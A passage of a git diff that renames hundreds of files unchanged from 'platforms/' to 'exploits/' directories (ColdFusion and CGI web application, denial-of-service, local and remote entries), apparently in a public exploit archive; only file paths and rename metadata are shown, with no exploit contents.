b/exploits/cfm/webapps/25982.txt similarity index 100% rename from platforms/cfm/webapps/25982.txt rename to exploits/cfm/webapps/25982.txt diff --git a/platforms/cfm/webapps/25983.txt b/exploits/cfm/webapps/25983.txt similarity index 100% rename from platforms/cfm/webapps/25983.txt rename to exploits/cfm/webapps/25983.txt diff --git a/platforms/cfm/webapps/25984.txt b/exploits/cfm/webapps/25984.txt similarity index 100% rename from platforms/cfm/webapps/25984.txt rename to exploits/cfm/webapps/25984.txt diff --git a/platforms/cfm/webapps/25985.txt b/exploits/cfm/webapps/25985.txt similarity index 100% rename from platforms/cfm/webapps/25985.txt rename to exploits/cfm/webapps/25985.txt diff --git a/platforms/cfm/webapps/26060.txt b/exploits/cfm/webapps/26060.txt similarity index 100% rename from platforms/cfm/webapps/26060.txt rename to exploits/cfm/webapps/26060.txt diff --git a/platforms/cfm/webapps/26065.txt b/exploits/cfm/webapps/26065.txt similarity index 100% rename from platforms/cfm/webapps/26065.txt rename to exploits/cfm/webapps/26065.txt diff --git a/platforms/cfm/webapps/26763.txt b/exploits/cfm/webapps/26763.txt similarity index 100% rename from platforms/cfm/webapps/26763.txt rename to exploits/cfm/webapps/26763.txt diff --git a/platforms/cfm/webapps/26764.txt b/exploits/cfm/webapps/26764.txt similarity index 100% rename from platforms/cfm/webapps/26764.txt rename to exploits/cfm/webapps/26764.txt diff --git a/platforms/cfm/webapps/26765.txt b/exploits/cfm/webapps/26765.txt similarity index 100% rename from platforms/cfm/webapps/26765.txt rename to exploits/cfm/webapps/26765.txt diff --git a/platforms/cfm/webapps/26766.txt b/exploits/cfm/webapps/26766.txt similarity index 100% rename from platforms/cfm/webapps/26766.txt rename to exploits/cfm/webapps/26766.txt diff --git a/platforms/cfm/webapps/26767.txt b/exploits/cfm/webapps/26767.txt similarity index 100% rename from platforms/cfm/webapps/26767.txt rename to exploits/cfm/webapps/26767.txt diff --git a/platforms/cfm/webapps/26772.txt b/exploits/cfm/webapps/26772.txt similarity index 100% rename from platforms/cfm/webapps/26772.txt rename to exploits/cfm/webapps/26772.txt diff --git a/platforms/cfm/webapps/26882.txt b/exploits/cfm/webapps/26882.txt similarity index 100% rename from platforms/cfm/webapps/26882.txt rename to exploits/cfm/webapps/26882.txt diff --git a/platforms/cfm/webapps/26909.txt b/exploits/cfm/webapps/26909.txt similarity index 100% rename from platforms/cfm/webapps/26909.txt rename to exploits/cfm/webapps/26909.txt diff --git a/platforms/cfm/webapps/26910.txt b/exploits/cfm/webapps/26910.txt similarity index 100% rename from platforms/cfm/webapps/26910.txt rename to exploits/cfm/webapps/26910.txt diff --git a/platforms/cfm/webapps/26920.txt b/exploits/cfm/webapps/26920.txt similarity index 100% rename from platforms/cfm/webapps/26920.txt rename to exploits/cfm/webapps/26920.txt diff --git a/platforms/cfm/webapps/26986.txt b/exploits/cfm/webapps/26986.txt similarity index 100% rename from platforms/cfm/webapps/26986.txt rename to exploits/cfm/webapps/26986.txt diff --git a/platforms/cfm/webapps/27455.txt b/exploits/cfm/webapps/27455.txt similarity index 100% rename from platforms/cfm/webapps/27455.txt rename to exploits/cfm/webapps/27455.txt diff --git a/platforms/cfm/webapps/27456.txt b/exploits/cfm/webapps/27456.txt similarity index 100% rename from platforms/cfm/webapps/27456.txt rename to exploits/cfm/webapps/27456.txt diff --git a/platforms/cfm/webapps/27457.txt b/exploits/cfm/webapps/27457.txt similarity index 100% rename from platforms/cfm/webapps/27457.txt rename to exploits/cfm/webapps/27457.txt diff --git a/platforms/cfm/webapps/27489.txt b/exploits/cfm/webapps/27489.txt similarity index 100% rename from platforms/cfm/webapps/27489.txt rename to exploits/cfm/webapps/27489.txt diff --git a/platforms/cfm/webapps/27490.txt b/exploits/cfm/webapps/27490.txt similarity index 100% rename from platforms/cfm/webapps/27490.txt rename to exploits/cfm/webapps/27490.txt diff --git a/platforms/cfm/webapps/27491.txt b/exploits/cfm/webapps/27491.txt similarity index 100% rename from platforms/cfm/webapps/27491.txt rename to exploits/cfm/webapps/27491.txt diff --git a/platforms/cfm/webapps/27493.txt b/exploits/cfm/webapps/27493.txt similarity index 100% rename from platforms/cfm/webapps/27493.txt rename to exploits/cfm/webapps/27493.txt diff --git a/platforms/cfm/webapps/27853.txt b/exploits/cfm/webapps/27853.txt similarity index 100% rename from platforms/cfm/webapps/27853.txt rename to exploits/cfm/webapps/27853.txt diff --git a/platforms/cfm/webapps/29334.txt b/exploits/cfm/webapps/29334.txt similarity index 100% rename from platforms/cfm/webapps/29334.txt rename to exploits/cfm/webapps/29334.txt diff --git a/platforms/cfm/webapps/29335.txt b/exploits/cfm/webapps/29335.txt similarity index 100% rename from platforms/cfm/webapps/29335.txt rename to exploits/cfm/webapps/29335.txt diff --git a/platforms/cfm/webapps/29567.txt b/exploits/cfm/webapps/29567.txt similarity index 100% rename from platforms/cfm/webapps/29567.txt rename to exploits/cfm/webapps/29567.txt diff --git a/platforms/cfm/webapps/30202.txt b/exploits/cfm/webapps/30202.txt similarity index 100% rename from platforms/cfm/webapps/30202.txt rename to exploits/cfm/webapps/30202.txt diff --git a/platforms/cfm/webapps/30206.txt b/exploits/cfm/webapps/30206.txt similarity index 100% rename from platforms/cfm/webapps/30206.txt rename to exploits/cfm/webapps/30206.txt diff --git a/platforms/cfm/webapps/30216.txt b/exploits/cfm/webapps/30216.txt similarity index 100% rename from platforms/cfm/webapps/30216.txt rename to exploits/cfm/webapps/30216.txt diff --git a/platforms/cfm/webapps/33167.txt b/exploits/cfm/webapps/33167.txt similarity index 100% rename from platforms/cfm/webapps/33167.txt rename to exploits/cfm/webapps/33167.txt diff --git a/platforms/cfm/webapps/33168.txt b/exploits/cfm/webapps/33168.txt similarity index 100% rename from platforms/cfm/webapps/33168.txt rename to exploits/cfm/webapps/33168.txt diff --git a/platforms/cfm/webapps/33169.txt b/exploits/cfm/webapps/33169.txt similarity index 100% rename from platforms/cfm/webapps/33169.txt rename to exploits/cfm/webapps/33169.txt diff --git a/platforms/cfm/webapps/33170.txt b/exploits/cfm/webapps/33170.txt similarity index 100% rename from platforms/cfm/webapps/33170.txt rename to exploits/cfm/webapps/33170.txt diff --git a/platforms/cfm/webapps/33575.txt b/exploits/cfm/webapps/33575.txt similarity index 100% rename from platforms/cfm/webapps/33575.txt rename to exploits/cfm/webapps/33575.txt diff --git a/platforms/cfm/webapps/33916.txt b/exploits/cfm/webapps/33916.txt similarity index 100% rename from platforms/cfm/webapps/33916.txt rename to exploits/cfm/webapps/33916.txt diff --git a/platforms/cfm/webapps/33948.txt b/exploits/cfm/webapps/33948.txt similarity index 100% rename from platforms/cfm/webapps/33948.txt rename to exploits/cfm/webapps/33948.txt diff --git a/platforms/cfm/webapps/35107.txt b/exploits/cfm/webapps/35107.txt similarity index 100% rename from platforms/cfm/webapps/35107.txt rename to exploits/cfm/webapps/35107.txt diff --git a/platforms/cfm/webapps/35256.txt b/exploits/cfm/webapps/35256.txt similarity index 100% rename from platforms/cfm/webapps/35256.txt rename to exploits/cfm/webapps/35256.txt diff --git a/platforms/cfm/webapps/36067.txt b/exploits/cfm/webapps/36067.txt similarity index 100% rename from platforms/cfm/webapps/36067.txt rename to exploits/cfm/webapps/36067.txt diff --git a/platforms/cfm/webapps/36172.txt b/exploits/cfm/webapps/36172.txt similarity index 100% rename from platforms/cfm/webapps/36172.txt rename to exploits/cfm/webapps/36172.txt diff --git a/platforms/cfm/webapps/36815.txt b/exploits/cfm/webapps/36815.txt similarity index 100% rename from platforms/cfm/webapps/36815.txt rename to exploits/cfm/webapps/36815.txt diff --git a/platforms/cfm/webapps/43045.txt b/exploits/cfm/webapps/43045.txt similarity index 100% rename from platforms/cfm/webapps/43045.txt rename to exploits/cfm/webapps/43045.txt diff --git a/platforms/cgi/dos/1157.pl b/exploits/cgi/dos/1157.pl similarity index 100% rename from platforms/cgi/dos/1157.pl rename to exploits/cgi/dos/1157.pl diff --git a/platforms/cgi/dos/1175.pl b/exploits/cgi/dos/1175.pl similarity index 100% rename from platforms/cgi/dos/1175.pl rename to exploits/cgi/dos/1175.pl diff --git a/platforms/cgi/dos/19899.txt b/exploits/cgi/dos/19899.txt similarity index 100% rename from platforms/cgi/dos/19899.txt rename to exploits/cgi/dos/19899.txt diff --git a/platforms/cgi/dos/20071.c b/exploits/cgi/dos/20071.c similarity index 100% rename from platforms/cgi/dos/20071.c rename to exploits/cgi/dos/20071.c diff --git a/platforms/cgi/dos/20400.txt b/exploits/cgi/dos/20400.txt similarity index 100% rename from platforms/cgi/dos/20400.txt rename to exploits/cgi/dos/20400.txt diff --git a/platforms/cgi/dos/20753.txt b/exploits/cgi/dos/20753.txt similarity index 100% rename from platforms/cgi/dos/20753.txt rename to exploits/cgi/dos/20753.txt diff --git a/platforms/cgi/dos/21048.txt b/exploits/cgi/dos/21048.txt similarity index 100% rename from platforms/cgi/dos/21048.txt rename to exploits/cgi/dos/21048.txt diff --git a/platforms/cgi/dos/21620.txt b/exploits/cgi/dos/21620.txt similarity index 100% rename from platforms/cgi/dos/21620.txt rename to exploits/cgi/dos/21620.txt diff --git a/platforms/cgi/dos/24619.txt b/exploits/cgi/dos/24619.txt similarity index 100% rename from platforms/cgi/dos/24619.txt rename to exploits/cgi/dos/24619.txt diff --git a/platforms/cgi/dos/3223.pl b/exploits/cgi/dos/3223.pl similarity index 100% rename from platforms/cgi/dos/3223.pl rename to exploits/cgi/dos/3223.pl diff --git a/platforms/cgi/dos/39073.txt b/exploits/cgi/dos/39073.txt similarity index 100% rename from platforms/cgi/dos/39073.txt rename to exploits/cgi/dos/39073.txt diff --git a/platforms/cgi/dos/817.pl b/exploits/cgi/dos/817.pl similarity index 100% rename from platforms/cgi/dos/817.pl rename to exploits/cgi/dos/817.pl diff --git a/platforms/cgi/local/20092.txt b/exploits/cgi/local/20092.txt similarity index 100% rename from platforms/cgi/local/20092.txt rename to exploits/cgi/local/20092.txt diff --git a/platforms/cgi/remote/10028.rb b/exploits/cgi/remote/10028.rb similarity index 100% rename from platforms/cgi/remote/10028.rb rename to exploits/cgi/remote/10028.rb diff --git a/platforms/cgi/remote/10037.rb b/exploits/cgi/remote/10037.rb similarity index 100% rename from platforms/cgi/remote/10037.rb rename to exploits/cgi/remote/10037.rb diff --git a/platforms/cgi/remote/16780.rb b/exploits/cgi/remote/16780.rb similarity index 100% rename from platforms/cgi/remote/16780.rb rename to exploits/cgi/remote/16780.rb diff --git a/platforms/cgi/remote/16795.rb b/exploits/cgi/remote/16795.rb similarity index 100% rename from platforms/cgi/remote/16795.rb rename to exploits/cgi/remote/16795.rb diff --git a/platforms/cgi/remote/18015.rb b/exploits/cgi/remote/18015.rb similarity index 100% rename from platforms/cgi/remote/18015.rb rename to exploits/cgi/remote/18015.rb diff --git a/platforms/cgi/remote/1862.c b/exploits/cgi/remote/1862.c similarity index 100% rename from platforms/cgi/remote/1862.c rename to exploits/cgi/remote/1862.c diff --git a/platforms/cgi/remote/19713.pl b/exploits/cgi/remote/19713.pl similarity index 100% rename from platforms/cgi/remote/19713.pl rename to exploits/cgi/remote/19713.pl diff --git a/platforms/cgi/remote/19741.pl b/exploits/cgi/remote/19741.pl similarity index 100% rename from platforms/cgi/remote/19741.pl rename to exploits/cgi/remote/19741.pl diff --git a/platforms/cgi/remote/19745.txt b/exploits/cgi/remote/19745.txt similarity index 100% rename from platforms/cgi/remote/19745.txt rename to exploits/cgi/remote/19745.txt diff --git a/platforms/cgi/remote/19747.txt b/exploits/cgi/remote/19747.txt similarity index 100% rename from platforms/cgi/remote/19747.txt rename to exploits/cgi/remote/19747.txt diff --git a/platforms/cgi/remote/19786.txt b/exploits/cgi/remote/19786.txt similarity index 100% rename from platforms/cgi/remote/19786.txt rename to exploits/cgi/remote/19786.txt diff --git a/platforms/cgi/remote/19795.txt b/exploits/cgi/remote/19795.txt similarity index 100% rename from platforms/cgi/remote/19795.txt rename to exploits/cgi/remote/19795.txt diff --git a/platforms/cgi/remote/19808.txt b/exploits/cgi/remote/19808.txt similarity index 100% rename from platforms/cgi/remote/19808.txt rename to exploits/cgi/remote/19808.txt diff --git a/platforms/cgi/remote/19842.txt b/exploits/cgi/remote/19842.txt similarity index 100% rename from platforms/cgi/remote/19842.txt rename to exploits/cgi/remote/19842.txt diff --git a/platforms/cgi/remote/19844.txt b/exploits/cgi/remote/19844.txt similarity index 100% rename from platforms/cgi/remote/19844.txt rename to exploits/cgi/remote/19844.txt diff --git a/platforms/cgi/remote/19852.txt b/exploits/cgi/remote/19852.txt similarity index 100% rename from platforms/cgi/remote/19852.txt rename to exploits/cgi/remote/19852.txt diff --git a/platforms/cgi/remote/19890.txt b/exploits/cgi/remote/19890.txt similarity index 100% rename from platforms/cgi/remote/19890.txt rename to exploits/cgi/remote/19890.txt diff --git a/platforms/cgi/remote/19909.pl b/exploits/cgi/remote/19909.pl similarity index 100% rename from platforms/cgi/remote/19909.pl rename to exploits/cgi/remote/19909.pl diff --git a/platforms/cgi/remote/19913.txt b/exploits/cgi/remote/19913.txt similarity index 100% rename from platforms/cgi/remote/19913.txt rename to exploits/cgi/remote/19913.txt diff --git a/platforms/cgi/remote/19921.txt b/exploits/cgi/remote/19921.txt similarity index 100% rename from platforms/cgi/remote/19921.txt rename to exploits/cgi/remote/19921.txt diff --git a/platforms/cgi/remote/19951.php b/exploits/cgi/remote/19951.php similarity index 100% rename from platforms/cgi/remote/19951.php rename to exploits/cgi/remote/19951.php diff --git a/platforms/cgi/remote/19956.txt b/exploits/cgi/remote/19956.txt similarity index 100% rename from platforms/cgi/remote/19956.txt rename to exploits/cgi/remote/19956.txt diff --git a/platforms/cgi/remote/19995.txt b/exploits/cgi/remote/19995.txt similarity index 100% rename from platforms/cgi/remote/19995.txt rename to exploits/cgi/remote/19995.txt diff --git a/platforms/cgi/remote/20007.c b/exploits/cgi/remote/20007.c similarity index 100% rename from platforms/cgi/remote/20007.c rename to exploits/cgi/remote/20007.c diff --git a/platforms/cgi/remote/20008.txt b/exploits/cgi/remote/20008.txt similarity index 100% rename from platforms/cgi/remote/20008.txt rename to exploits/cgi/remote/20008.txt diff --git a/platforms/cgi/remote/20041.txt b/exploits/cgi/remote/20041.txt similarity index 100% rename from platforms/cgi/remote/20041.txt rename to exploits/cgi/remote/20041.txt diff --git a/platforms/cgi/remote/20059.txt b/exploits/cgi/remote/20059.txt similarity index 100% rename from platforms/cgi/remote/20059.txt rename to exploits/cgi/remote/20059.txt diff --git a/platforms/cgi/remote/20068.txt b/exploits/cgi/remote/20068.txt similarity index 100% rename from platforms/cgi/remote/20068.txt rename to exploits/cgi/remote/20068.txt diff --git a/platforms/cgi/remote/20085.txt b/exploits/cgi/remote/20085.txt similarity index 100% rename from platforms/cgi/remote/20085.txt rename to exploits/cgi/remote/20085.txt diff --git a/platforms/cgi/remote/20156.txt b/exploits/cgi/remote/20156.txt similarity index 100% rename from platforms/cgi/remote/20156.txt rename to exploits/cgi/remote/20156.txt diff --git a/platforms/cgi/remote/20164.pl b/exploits/cgi/remote/20164.pl similarity index 100% rename from platforms/cgi/remote/20164.pl rename to exploits/cgi/remote/20164.pl diff --git a/platforms/cgi/remote/20165.html b/exploits/cgi/remote/20165.html similarity index 100% rename from platforms/cgi/remote/20165.html rename to exploits/cgi/remote/20165.html diff --git a/platforms/cgi/remote/20176.pl b/exploits/cgi/remote/20176.pl similarity index 100% rename from platforms/cgi/remote/20176.pl rename to exploits/cgi/remote/20176.pl diff --git a/platforms/cgi/remote/20177.html b/exploits/cgi/remote/20177.html similarity index 100% rename from platforms/cgi/remote/20177.html rename to exploits/cgi/remote/20177.html diff --git a/platforms/cgi/remote/20183.pl b/exploits/cgi/remote/20183.pl similarity index 100% rename from platforms/cgi/remote/20183.pl rename to exploits/cgi/remote/20183.pl diff --git a/platforms/cgi/remote/20194.pl b/exploits/cgi/remote/20194.pl similarity index 100% rename from platforms/cgi/remote/20194.pl rename to exploits/cgi/remote/20194.pl diff --git a/platforms/cgi/remote/20218.txt b/exploits/cgi/remote/20218.txt similarity index 100% rename from platforms/cgi/remote/20218.txt rename to exploits/cgi/remote/20218.txt diff --git a/platforms/cgi/remote/20238.txt b/exploits/cgi/remote/20238.txt similarity index 100% rename from platforms/cgi/remote/20238.txt rename to exploits/cgi/remote/20238.txt diff --git a/platforms/cgi/remote/20242.txt b/exploits/cgi/remote/20242.txt similarity index 100% rename from platforms/cgi/remote/20242.txt rename to exploits/cgi/remote/20242.txt diff --git a/platforms/cgi/remote/20244.txt b/exploits/cgi/remote/20244.txt similarity index 100% rename from platforms/cgi/remote/20244.txt rename to exploits/cgi/remote/20244.txt diff --git a/platforms/cgi/remote/20245.txt b/exploits/cgi/remote/20245.txt similarity index 100% rename from platforms/cgi/remote/20245.txt rename to exploits/cgi/remote/20245.txt diff --git a/platforms/cgi/remote/20273.txt b/exploits/cgi/remote/20273.txt similarity index 100% rename from platforms/cgi/remote/20273.txt rename to exploits/cgi/remote/20273.txt diff --git a/platforms/cgi/remote/20277.txt b/exploits/cgi/remote/20277.txt similarity index 100% rename from platforms/cgi/remote/20277.txt rename to exploits/cgi/remote/20277.txt diff --git a/platforms/cgi/remote/20279.txt b/exploits/cgi/remote/20279.txt similarity index 100% rename from platforms/cgi/remote/20279.txt rename to exploits/cgi/remote/20279.txt diff --git a/platforms/cgi/remote/20280.txt b/exploits/cgi/remote/20280.txt similarity index 100% rename from platforms/cgi/remote/20280.txt rename to exploits/cgi/remote/20280.txt diff --git a/platforms/cgi/remote/20281.txt b/exploits/cgi/remote/20281.txt similarity index 100% rename from platforms/cgi/remote/20281.txt rename to exploits/cgi/remote/20281.txt diff --git a/platforms/cgi/remote/20303.pl b/exploits/cgi/remote/20303.pl similarity index 100% rename from platforms/cgi/remote/20303.pl rename to exploits/cgi/remote/20303.pl diff --git a/platforms/cgi/remote/20370.txt b/exploits/cgi/remote/20370.txt similarity index 100% rename from platforms/cgi/remote/20370.txt rename to exploits/cgi/remote/20370.txt diff --git a/platforms/cgi/remote/20387.txt b/exploits/cgi/remote/20387.txt similarity index 100% rename from platforms/cgi/remote/20387.txt rename to exploits/cgi/remote/20387.txt diff --git a/platforms/cgi/remote/20397.txt b/exploits/cgi/remote/20397.txt similarity index 100% rename from platforms/cgi/remote/20397.txt rename to exploits/cgi/remote/20397.txt diff --git a/platforms/cgi/remote/20405.pl b/exploits/cgi/remote/20405.pl similarity index 100% rename from platforms/cgi/remote/20405.pl rename to exploits/cgi/remote/20405.pl diff --git a/platforms/cgi/remote/20408.txt b/exploits/cgi/remote/20408.txt similarity index 100% rename from platforms/cgi/remote/20408.txt rename to exploits/cgi/remote/20408.txt diff --git a/platforms/cgi/remote/20423.txt b/exploits/cgi/remote/20423.txt similarity index 100% rename from platforms/cgi/remote/20423.txt rename to exploits/cgi/remote/20423.txt diff --git a/platforms/cgi/remote/20430.txt b/exploits/cgi/remote/20430.txt similarity index 100% rename from platforms/cgi/remote/20430.txt rename to exploits/cgi/remote/20430.txt diff --git a/platforms/cgi/remote/20433.txt b/exploits/cgi/remote/20433.txt similarity index 100% rename from platforms/cgi/remote/20433.txt rename to exploits/cgi/remote/20433.txt diff --git a/platforms/cgi/remote/20434.txt b/exploits/cgi/remote/20434.txt similarity index 100% rename from platforms/cgi/remote/20434.txt rename to exploits/cgi/remote/20434.txt diff --git a/platforms/cgi/remote/20435.txt b/exploits/cgi/remote/20435.txt similarity index 100% rename from platforms/cgi/remote/20435.txt rename to exploits/cgi/remote/20435.txt diff --git a/platforms/cgi/remote/20442.html b/exploits/cgi/remote/20442.html similarity index 100% rename from platforms/cgi/remote/20442.html rename to exploits/cgi/remote/20442.html diff --git a/platforms/cgi/remote/20444.txt b/exploits/cgi/remote/20444.txt similarity index 100% rename from platforms/cgi/remote/20444.txt rename to exploits/cgi/remote/20444.txt diff --git a/platforms/cgi/remote/20446.txt b/exploits/cgi/remote/20446.txt similarity index 100% rename from platforms/cgi/remote/20446.txt rename to exploits/cgi/remote/20446.txt diff --git a/platforms/cgi/remote/20447.txt b/exploits/cgi/remote/20447.txt similarity index 100% rename from platforms/cgi/remote/20447.txt rename to exploits/cgi/remote/20447.txt diff --git a/platforms/cgi/remote/20448.txt b/exploits/cgi/remote/20448.txt similarity index 100% rename from platforms/cgi/remote/20448.txt rename to exploits/cgi/remote/20448.txt diff --git a/platforms/cgi/remote/20463.txt b/exploits/cgi/remote/20463.txt similarity index 100% rename from platforms/cgi/remote/20463.txt rename to exploits/cgi/remote/20463.txt diff --git a/platforms/cgi/remote/20465.sh b/exploits/cgi/remote/20465.sh similarity index 100% rename from platforms/cgi/remote/20465.sh rename to exploits/cgi/remote/20465.sh diff --git a/platforms/cgi/remote/20483.txt b/exploits/cgi/remote/20483.txt similarity index 100% rename from platforms/cgi/remote/20483.txt rename to exploits/cgi/remote/20483.txt diff --git a/platforms/cgi/remote/20497.html b/exploits/cgi/remote/20497.html similarity index 100% rename from platforms/cgi/remote/20497.html rename to exploits/cgi/remote/20497.html diff --git a/platforms/cgi/remote/20503.html b/exploits/cgi/remote/20503.html similarity index 100% rename from platforms/cgi/remote/20503.html rename to exploits/cgi/remote/20503.html diff --git a/platforms/cgi/remote/20504.html b/exploits/cgi/remote/20504.html similarity index 100% rename from platforms/cgi/remote/20504.html rename to exploits/cgi/remote/20504.html diff --git a/platforms/cgi/remote/20506.html b/exploits/cgi/remote/20506.html similarity index 100% rename from platforms/cgi/remote/20506.html rename to exploits/cgi/remote/20506.html diff --git a/platforms/cgi/remote/20522.txt b/exploits/cgi/remote/20522.txt similarity index 100% rename from platforms/cgi/remote/20522.txt rename to exploits/cgi/remote/20522.txt diff --git a/platforms/cgi/remote/20523.pl b/exploits/cgi/remote/20523.pl similarity index 100% rename from platforms/cgi/remote/20523.pl rename to exploits/cgi/remote/20523.pl diff --git a/platforms/cgi/remote/20524.txt b/exploits/cgi/remote/20524.txt similarity index 100% rename from platforms/cgi/remote/20524.txt rename to exploits/cgi/remote/20524.txt diff --git a/platforms/cgi/remote/20525.txt b/exploits/cgi/remote/20525.txt similarity index 100% rename from platforms/cgi/remote/20525.txt rename to exploits/cgi/remote/20525.txt diff --git a/platforms/cgi/remote/20527.txt b/exploits/cgi/remote/20527.txt similarity index 100% rename from platforms/cgi/remote/20527.txt rename to exploits/cgi/remote/20527.txt diff --git a/platforms/cgi/remote/20533.txt b/exploits/cgi/remote/20533.txt similarity index 100% rename from platforms/cgi/remote/20533.txt rename to exploits/cgi/remote/20533.txt diff --git a/platforms/cgi/remote/20567.txt b/exploits/cgi/remote/20567.txt similarity index 100% rename from platforms/cgi/remote/20567.txt rename to exploits/cgi/remote/20567.txt diff --git a/platforms/cgi/remote/20570.txt b/exploits/cgi/remote/20570.txt similarity index 100% rename from platforms/cgi/remote/20570.txt rename to exploits/cgi/remote/20570.txt diff --git a/platforms/cgi/remote/20583.pl b/exploits/cgi/remote/20583.pl similarity index 100% rename from platforms/cgi/remote/20583.pl rename to exploits/cgi/remote/20583.pl diff --git a/platforms/cgi/remote/20606.pl b/exploits/cgi/remote/20606.pl similarity index 100% rename from platforms/cgi/remote/20606.pl rename to exploits/cgi/remote/20606.pl diff --git a/platforms/cgi/remote/20609.txt b/exploits/cgi/remote/20609.txt similarity index 100% rename from platforms/cgi/remote/20609.txt rename to exploits/cgi/remote/20609.txt diff --git a/platforms/cgi/remote/20611.txt b/exploits/cgi/remote/20611.txt similarity index 100% rename from platforms/cgi/remote/20611.txt rename to exploits/cgi/remote/20611.txt diff --git a/platforms/cgi/remote/20623.txt b/exploits/cgi/remote/20623.txt similarity index 100% rename from platforms/cgi/remote/20623.txt rename to exploits/cgi/remote/20623.txt diff --git a/platforms/cgi/remote/20629.txt b/exploits/cgi/remote/20629.txt similarity index 100% rename from platforms/cgi/remote/20629.txt rename to exploits/cgi/remote/20629.txt diff --git a/platforms/cgi/remote/20630.txt b/exploits/cgi/remote/20630.txt similarity index 100% rename from platforms/cgi/remote/20630.txt rename to exploits/cgi/remote/20630.txt diff --git a/platforms/cgi/remote/20631.txt b/exploits/cgi/remote/20631.txt similarity index 100% rename from platforms/cgi/remote/20631.txt rename to exploits/cgi/remote/20631.txt diff --git a/platforms/cgi/remote/20632.txt b/exploits/cgi/remote/20632.txt similarity index 100% rename from platforms/cgi/remote/20632.txt rename to exploits/cgi/remote/20632.txt diff --git a/platforms/cgi/remote/20633.txt b/exploits/cgi/remote/20633.txt similarity index 100% rename from platforms/cgi/remote/20633.txt rename to exploits/cgi/remote/20633.txt diff --git a/platforms/cgi/remote/20642.pl b/exploits/cgi/remote/20642.pl similarity index 100% rename from platforms/cgi/remote/20642.pl rename to exploits/cgi/remote/20642.pl diff --git a/platforms/cgi/remote/20683.txt b/exploits/cgi/remote/20683.txt similarity index 100% rename from platforms/cgi/remote/20683.txt rename to exploits/cgi/remote/20683.txt diff --git a/platforms/cgi/remote/20686.txt b/exploits/cgi/remote/20686.txt similarity index 100% rename from platforms/cgi/remote/20686.txt rename to exploits/cgi/remote/20686.txt diff --git a/platforms/cgi/remote/20689.pl b/exploits/cgi/remote/20689.pl similarity index 100% rename from platforms/cgi/remote/20689.pl rename to exploits/cgi/remote/20689.pl diff --git a/platforms/cgi/remote/20714.txt b/exploits/cgi/remote/20714.txt similarity index 100% rename from platforms/cgi/remote/20714.txt rename to exploits/cgi/remote/20714.txt diff --git a/platforms/cgi/remote/20725.txt b/exploits/cgi/remote/20725.txt similarity index 100% rename from platforms/cgi/remote/20725.txt rename to exploits/cgi/remote/20725.txt diff --git a/platforms/cgi/remote/20744.pl b/exploits/cgi/remote/20744.pl similarity index 100% rename from platforms/cgi/remote/20744.pl rename to exploits/cgi/remote/20744.pl diff --git a/platforms/cgi/remote/20752.txt b/exploits/cgi/remote/20752.txt similarity index 100% rename from platforms/cgi/remote/20752.txt rename to exploits/cgi/remote/20752.txt diff --git a/platforms/cgi/remote/20780.c b/exploits/cgi/remote/20780.c similarity index 100% rename from platforms/cgi/remote/20780.c rename to exploits/cgi/remote/20780.c diff --git a/platforms/cgi/remote/20799.c b/exploits/cgi/remote/20799.c similarity index 100% rename from platforms/cgi/remote/20799.c rename to exploits/cgi/remote/20799.c diff --git a/platforms/cgi/remote/20800.c b/exploits/cgi/remote/20800.c similarity index 100% rename from platforms/cgi/remote/20800.c rename to exploits/cgi/remote/20800.c diff --git a/platforms/cgi/remote/20801.c b/exploits/cgi/remote/20801.c similarity index 100% rename from platforms/cgi/remote/20801.c rename to exploits/cgi/remote/20801.c diff --git a/platforms/cgi/remote/20808.txt b/exploits/cgi/remote/20808.txt similarity index 100% rename from platforms/cgi/remote/20808.txt rename to exploits/cgi/remote/20808.txt diff --git a/platforms/cgi/remote/20809.html b/exploits/cgi/remote/20809.html similarity index 100% rename from platforms/cgi/remote/20809.html rename to exploits/cgi/remote/20809.html diff --git a/platforms/cgi/remote/20831.txt b/exploits/cgi/remote/20831.txt similarity index 100% rename from platforms/cgi/remote/20831.txt rename to exploits/cgi/remote/20831.txt diff --git a/platforms/cgi/remote/20832.txt b/exploits/cgi/remote/20832.txt similarity index 100% rename from platforms/cgi/remote/20832.txt rename to exploits/cgi/remote/20832.txt diff --git a/platforms/cgi/remote/20833.txt b/exploits/cgi/remote/20833.txt similarity index 100% rename from platforms/cgi/remote/20833.txt rename to exploits/cgi/remote/20833.txt diff --git a/platforms/cgi/remote/20849.pl b/exploits/cgi/remote/20849.pl similarity index 100% rename from platforms/cgi/remote/20849.pl rename to exploits/cgi/remote/20849.pl diff --git a/platforms/cgi/remote/20878.txt b/exploits/cgi/remote/20878.txt similarity index 100% rename from platforms/cgi/remote/20878.txt rename to exploits/cgi/remote/20878.txt diff --git a/platforms/cgi/remote/20887.txt b/exploits/cgi/remote/20887.txt similarity index 100% rename from platforms/cgi/remote/20887.txt rename to exploits/cgi/remote/20887.txt diff --git a/platforms/cgi/remote/20895.txt b/exploits/cgi/remote/20895.txt similarity index 100% rename from platforms/cgi/remote/20895.txt rename to exploits/cgi/remote/20895.txt diff --git a/platforms/cgi/remote/20914.pl b/exploits/cgi/remote/20914.pl similarity index 100% rename from platforms/cgi/remote/20914.pl rename to exploits/cgi/remote/20914.pl diff --git a/platforms/cgi/remote/20916.pl b/exploits/cgi/remote/20916.pl similarity index 100% rename from platforms/cgi/remote/20916.pl rename to exploits/cgi/remote/20916.pl diff --git a/platforms/cgi/remote/20935.pl b/exploits/cgi/remote/20935.pl similarity index 100% rename from platforms/cgi/remote/20935.pl rename to exploits/cgi/remote/20935.pl diff --git a/platforms/cgi/remote/20938.txt b/exploits/cgi/remote/20938.txt similarity index 100% rename from platforms/cgi/remote/20938.txt rename to exploits/cgi/remote/20938.txt diff --git a/platforms/cgi/remote/20939.txt b/exploits/cgi/remote/20939.txt similarity index 100% rename from platforms/cgi/remote/20939.txt rename to exploits/cgi/remote/20939.txt diff --git a/platforms/cgi/remote/20940.txt b/exploits/cgi/remote/20940.txt similarity index 100% rename from platforms/cgi/remote/20940.txt rename to exploits/cgi/remote/20940.txt diff --git a/platforms/cgi/remote/20982.pl b/exploits/cgi/remote/20982.pl similarity index 100% rename from platforms/cgi/remote/20982.pl rename to exploits/cgi/remote/20982.pl diff --git a/platforms/cgi/remote/21008.txt b/exploits/cgi/remote/21008.txt similarity index 100% rename from platforms/cgi/remote/21008.txt rename to exploits/cgi/remote/21008.txt diff --git a/platforms/cgi/remote/21023.txt b/exploits/cgi/remote/21023.txt similarity index 100% rename from platforms/cgi/remote/21023.txt rename to exploits/cgi/remote/21023.txt diff --git a/platforms/cgi/remote/21068.txt b/exploits/cgi/remote/21068.txt similarity index 100% rename from platforms/cgi/remote/21068.txt rename to exploits/cgi/remote/21068.txt diff --git a/platforms/cgi/remote/211.c b/exploits/cgi/remote/211.c similarity index 100% 